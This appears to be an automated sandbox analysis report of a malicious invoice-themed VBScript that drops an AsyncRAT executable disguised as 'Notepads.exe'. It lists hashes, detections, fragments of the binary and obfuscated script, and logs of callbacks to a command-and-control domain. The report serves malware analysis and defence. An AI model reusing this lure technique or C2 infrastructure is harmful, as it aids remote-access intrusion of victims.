                                            Preview: .W..j..H
                                            C:\Users\user\AppData\Roaming\Notepads.exe
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines, with CRLF line terminators
                                            Entropy (8bit):5.625953655922885
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:Invoice No F1019855_PDF.vbs
                                            File size:498648
                                            MD5:ce4dcec84bfeba49404fa70f5d137645
                                            SHA1:c31021953c59af126d0095bea70c26ca02a2d954
                                            SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
                                            SHA512:206f93128c63f78891cd55aff0a2ffe74696845df2f1d2a359bd569716f2a8a7d68c9b12c724c3b5e35963664eba8ce41d8eb65c54f5f36d256fb850635e7b01
                                            SSDEEP:12288:hpwkVfVJwJJTtAm+7Jx1zCBEDiBsrvODJ2+oDhX+K2jid:/wkVfsJoz8srvOXoZdMid
                                            File Content Preview:on error resume next..Dim gTzLXUWzCBikJZhvnBenaiztweMohtxHSfLxABGzBuMkSVcBIAEZctzxUFPtIhRIDbRdOkvmvemfWPbaCKghoYeYgNculNrTdDgqDynYESexHTbFdpqxBjTfwtxAHAAhnSCSikWDXIdVuhRMmXRvWuSujBuKBmQDSwKpRJWsTmZtGykPbkOkjELsAIihqLClrZDyWcvcAYc..'jUYnlQfiRYgTNkRoIapCHko

                                            File Icon

                                            Icon Hash:e8d69ece869a9ec4

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/04/21-19:09:41.909556ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:41.947594ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                            05/04/21-19:09:41.948113ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:41.983261ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                            05/04/21-19:09:41.983749ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.024316ICMP449ICMP Time-To-Live Exceeded in Transit81.95.15.57192.168.2.6
                                            05/04/21-19:09:42.024859ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.066114ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.202192.168.2.6
                                            05/04/21-19:09:42.066597ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.125981ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.129192.168.2.6
                                            05/04/21-19:09:42.126280ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.166881ICMP408ICMP Echo Reply93.184.221.240192.168.2.6
                                            05/04/21-19:09:51.927237ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                            05/04/21-19:09:52.614087ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                            05/04/21-19:09:53.652130ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 19:09:51.665118933 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:51.869891882 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:52.529974937 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:52.750188112 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:53.326894045 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:53.539463997 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:57.936311960 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:58.249712944 CEST119404972079.137.109.121192.168.2.6
                                            May 4, 2021 19:09:58.764899015 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:04.781049967 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:05.049330950 CEST119404972079.137.109.121192.168.2.6
                                            May 4, 2021 19:10:09.318511963 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:09.537698030 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:10.047120094 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:10.330120087 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:10.843995094 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:11.079242945 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:15.182888031 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:15.367213964 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:15.875750065 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:16.059684038 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:16.656979084 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:16.840795040 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:20.893501997 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:21.077951908 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:21.610613108 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:21.794799089 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:22.313693047 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:22.497848988 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:26.502759933 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:26.686959982 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:27.189443111 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:27.375371933 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:27.876647949 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:28.060919046 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:32.288645029 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:32.490320921 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:33.048998117 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:33.359824896 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:33.939697027 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:34.280600071 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:38.389955997 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:38.623215914 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:39.127610922 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:39.383506060 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:39.893307924 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:40.281352997 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:44.478796005 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:44.762293100 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:45.268805027 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:45.514317036 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:46.034485102 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:46.274096966 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:50.286705017 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:50.470845938 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:50.972688913 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:51.156806946 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:51.659928083 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:51.844125032 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:55.852686882 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:56.036375999 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:56.551004887 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:56.734479904 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:57.239084005 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:57.422533035 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:01.428244114 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:01.614038944 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:02.114063978 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:02.298418999 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:02.801588058 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:02.986004114 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:07.115073919 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:07.517537117 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:08.023256063 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:08.302828074 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:08.817667961 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:09.164896011 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:13.284063101 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:13.512885094 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:14.021348000 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:14.275142908 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:14.787311077 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:15.019846916 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:19.257008076 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:19.520687103 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:20.021739006 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:20.341989040 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:20.849893093 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:21.053107977 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:25.972309113 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:26.156596899 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:26.709850073 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:26.894299984 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:27.413050890 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:27.596800089 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:31.610606909 CEST4976011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:31.794442892 CEST1194049760191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:32.322751045 CEST4976011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:32.506926060 CEST1194049760191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:33.009179115 CEST4976011940192.168.2.6191.96.25.26

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 19:09:35.166640043 CEST5451353192.168.2.68.8.8.8
                                            May 4, 2021 19:09:35.226166964 CEST53545138.8.8.8192.168.2.6
                                            May 4, 2021 19:09:36.041585922 CEST6204453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:36.066652060 CEST6379153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:36.090827942 CEST53620448.8.8.8192.168.2.6
                                            May 4, 2021 19:09:36.130598068 CEST53637918.8.8.8192.168.2.6
                                            May 4, 2021 19:09:37.244179010 CEST6426753192.168.2.68.8.8.8
                                            May 4, 2021 19:09:37.292851925 CEST53642678.8.8.8192.168.2.6
                                            May 4, 2021 19:09:38.124545097 CEST4944853192.168.2.68.8.8.8
                                            May 4, 2021 19:09:38.173890114 CEST53494488.8.8.8192.168.2.6
                                            May 4, 2021 19:09:39.295962095 CEST6034253192.168.2.68.8.8.8
                                            May 4, 2021 19:09:39.347642899 CEST53603428.8.8.8192.168.2.6
                                            May 4, 2021 19:09:40.401742935 CEST6134653192.168.2.68.8.8.8
                                            May 4, 2021 19:09:40.451777935 CEST53613468.8.8.8192.168.2.6
                                            May 4, 2021 19:09:41.416285992 CEST5177453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:41.467761993 CEST53517748.8.8.8192.168.2.6
                                            May 4, 2021 19:09:41.859519005 CEST5602353192.168.2.68.8.8.8
                                            May 4, 2021 19:09:41.908530951 CEST53560238.8.8.8192.168.2.6
                                            May 4, 2021 19:09:42.248583078 CEST5838453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:42.300246954 CEST53583848.8.8.8192.168.2.6
                                            May 4, 2021 19:09:43.165975094 CEST6026153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:43.220256090 CEST53602618.8.8.8192.168.2.6
                                            May 4, 2021 19:09:45.722426891 CEST5606153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:45.772176027 CEST53560618.8.8.8192.168.2.6
                                            May 4, 2021 19:09:46.677294970 CEST5833653192.168.2.68.8.8.8
                                            May 4, 2021 19:09:46.734442949 CEST53583368.8.8.8192.168.2.6
                                            May 4, 2021 19:09:47.388607979 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.446315050 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.565787077 CEST5406453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.614599943 CEST53540648.8.8.8192.168.2.6
                                            May 4, 2021 19:09:49.476988077 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:49.713926077 CEST5281153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:49.765503883 CEST53528118.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.422622919 CEST5529953192.168.2.68.8.8.8
                                            May 4, 2021 19:09:51.474486113 CEST53552998.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.483484030 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:51.643963099 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.927154064 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:52.382672071 CEST6374553192.168.2.68.8.8.8
                                            May 4, 2021 19:09:52.431269884 CEST53637458.8.8.8192.168.2.6
                                            May 4, 2021 19:09:52.613918066 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:53.393827915 CEST5005553192.168.2.68.8.8.8
                                            May 4, 2021 19:09:53.442527056 CEST53500558.8.8.8192.168.2.6
                                            May 4, 2021 19:09:53.652007103 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:54.367537975 CEST6137453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:54.416326046 CEST53613748.8.8.8192.168.2.6
                                            May 4, 2021 19:09:57.843883038 CEST5033953192.168.2.68.8.8.8
                                            May 4, 2021 19:09:57.901256084 CEST53503398.8.8.8192.168.2.6
                                            May 4, 2021 19:10:09.150386095 CEST6330753192.168.2.68.8.8.8
                                            May 4, 2021 19:10:09.302356005 CEST53633078.8.8.8192.168.2.6
                                            May 4, 2021 19:10:10.029165983 CEST4969453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:10.077960014 CEST53496948.8.8.8192.168.2.6
                                            May 4, 2021 19:10:14.043780088 CEST5498253192.168.2.68.8.8.8
                                            May 4, 2021 19:10:14.102976084 CEST53549828.8.8.8192.168.2.6
                                            May 4, 2021 19:10:30.211396933 CEST5001053192.168.2.68.8.8.8
                                            May 4, 2021 19:10:30.262897968 CEST53500108.8.8.8192.168.2.6
                                            May 4, 2021 19:10:32.124850988 CEST6371853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:32.284786940 CEST53637188.8.8.8192.168.2.6
                                            May 4, 2021 19:10:32.749340057 CEST6211653192.168.2.68.8.8.8
                                            May 4, 2021 19:10:32.874445915 CEST53621168.8.8.8192.168.2.6
                                            May 4, 2021 19:10:33.930727005 CEST6381653192.168.2.68.8.8.8
                                            May 4, 2021 19:10:34.048940897 CEST53638168.8.8.8192.168.2.6
                                            May 4, 2021 19:10:36.912386894 CEST5501453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:36.970125914 CEST53550148.8.8.8192.168.2.6
                                            May 4, 2021 19:10:37.764956951 CEST6220853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:37.832662106 CEST53622088.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.024754047 CEST5757453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.135011911 CEST53575748.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.339664936 CEST5181853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.388328075 CEST53518188.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.754163027 CEST5662853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.814485073 CEST53566288.8.8.8192.168.2.6
                                            May 4, 2021 19:10:40.104118109 CEST6077853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:40.152796984 CEST53607788.8.8.8192.168.2.6
                                            May 4, 2021 19:10:40.631432056 CEST5379953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:40.691595078 CEST53537998.8.8.8192.168.2.6
                                            May 4, 2021 19:10:41.433511972 CEST5468353192.168.2.68.8.8.8
                                            May 4, 2021 19:10:41.486386061 CEST53546838.8.8.8192.168.2.6
                                            May 4, 2021 19:10:43.340945005 CEST5932953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:43.398149967 CEST53593298.8.8.8192.168.2.6
                                            May 4, 2021 19:10:44.105753899 CEST6402153192.168.2.68.8.8.8
                                            May 4, 2021 19:10:44.166434050 CEST53640218.8.8.8192.168.2.6
                                            May 4, 2021 19:10:44.418627977 CEST5612953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:44.475996017 CEST53561298.8.8.8192.168.2.6
                                            May 4, 2021 19:10:47.745666981 CEST5817753192.168.2.68.8.8.8
                                            May 4, 2021 19:10:47.806412935 CEST53581778.8.8.8192.168.2.6
                                            May 4, 2021 19:11:07.055581093 CEST5070053192.168.2.68.8.8.8
                                            May 4, 2021 19:11:07.113138914 CEST53507008.8.8.8192.168.2.6
                                            May 4, 2021 19:11:13.231501102 CEST5406953192.168.2.68.8.8.8
                                            May 4, 2021 19:11:13.282305002 CEST53540698.8.8.8192.168.2.6
                                            May 4, 2021 19:11:14.340991974 CEST6117853192.168.2.68.8.8.8
                                            May 4, 2021 19:11:14.398482084 CEST53611788.8.8.8192.168.2.6
                                            May 4, 2021 19:11:19.050941944 CEST5701753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:19.108181953 CEST53570178.8.8.8192.168.2.6
                                            May 4, 2021 19:11:19.917026997 CEST5632753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:19.966650009 CEST53563278.8.8.8192.168.2.6
                                            May 4, 2021 19:11:27.702534914 CEST5024353192.168.2.68.8.8.8
                                            May 4, 2021 19:11:27.774426937 CEST53502438.8.8.8192.168.2.6
                                            May 4, 2021 19:11:34.072407007 CEST6205553192.168.2.68.8.8.8
                                            May 4, 2021 19:11:34.134166002 CEST53620558.8.8.8192.168.2.6
                                            May 4, 2021 19:11:39.420672894 CEST6124953192.168.2.68.8.8.8
                                            May 4, 2021 19:11:39.478065014 CEST53612498.8.8.8192.168.2.6
                                            May 4, 2021 19:11:43.058330059 CEST6525253192.168.2.68.8.8.8
                                            May 4, 2021 19:11:43.115463972 CEST53652528.8.8.8192.168.2.6
                                            May 4, 2021 19:11:44.819533110 CEST6436753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:44.879615068 CEST53643678.8.8.8192.168.2.6
                                            May 4, 2021 19:11:51.660826921 CEST5506653192.168.2.68.8.8.8
                                            May 4, 2021 19:11:51.930774927 CEST6021153192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.674628973 CEST5506653192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.723125935 CEST53550668.8.8.8192.168.2.6
                                            May 4, 2021 19:11:52.940547943 CEST6021153192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.997445107 CEST53602118.8.8.8192.168.2.6

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            May 4, 2021 19:09:51.927237034 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable
                                            May 4, 2021 19:09:52.614087105 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable
                                            May 4, 2021 19:09:53.652129889 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 4, 2021 19:09:47.388607979 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:48.446315050 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:49.476988077 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:51.483484030 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:57.843883038 CEST192.168.2.68.8.8.80xa655Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:09.150386095 CEST192.168.2.68.8.8.80x6c53Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:32.124850988 CEST192.168.2.68.8.8.80xb54cStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:38.339664936 CEST192.168.2.68.8.8.80x7013Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:44.418627977 CEST192.168.2.68.8.8.80xae48Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:07.055581093 CEST192.168.2.68.8.8.80x8756Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:13.231501102 CEST192.168.2.68.8.8.80x7beStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:19.050941944 CEST192.168.2.68.8.8.80xbae2Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:34.072407007 CEST192.168.2.68.8.8.80x2258Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:39.420672894 CEST192.168.2.68.8.8.80xf9f0Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:43.058330059 CEST192.168.2.68.8.8.80x9541Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:44.819533110 CEST192.168.2.68.8.8.80x645dStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:51.660826921 CEST192.168.2.68.8.8.80xeab6Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:51.930774927 CEST192.168.2.68.8.8.80x4cd3Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.674628973 CEST192.168.2.68.8.8.80xeab6Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.940547943 CEST192.168.2.68.8.8.80x4cd3Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 4, 2021 19:09:51.643963099 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:51.927154064 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:52.613918066 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:53.652007103 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:57.901256084 CEST8.8.8.8192.168.2.60xa655No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:09.302356005 CEST8.8.8.8192.168.2.60x6c53No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:32.284786940 CEST8.8.8.8192.168.2.60xb54cNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:38.388328075 CEST8.8.8.8192.168.2.60x7013No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:44.475996017 CEST8.8.8.8192.168.2.60xae48No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:07.113138914 CEST8.8.8.8192.168.2.60x8756No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:13.282305002 CEST8.8.8.8192.168.2.60x7beNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:19.108181953 CEST8.8.8.8192.168.2.60xbae2No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:34.134166002 CEST8.8.8.8192.168.2.60x2258No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:39.478065014 CEST8.8.8.8192.168.2.60xf9f0No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:43.115463972 CEST8.8.8.8192.168.2.60x9541No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:44.879615068 CEST8.8.8.8192.168.2.60x645dNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.723125935 CEST8.8.8.8192.168.2.60xeab6No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.997445107 CEST8.8.8.8192.168.2.60x4cd3No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: wscript.exe PID: 6428 Parent PID: 3440

                                            General

                                            Start time:19:09:42
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
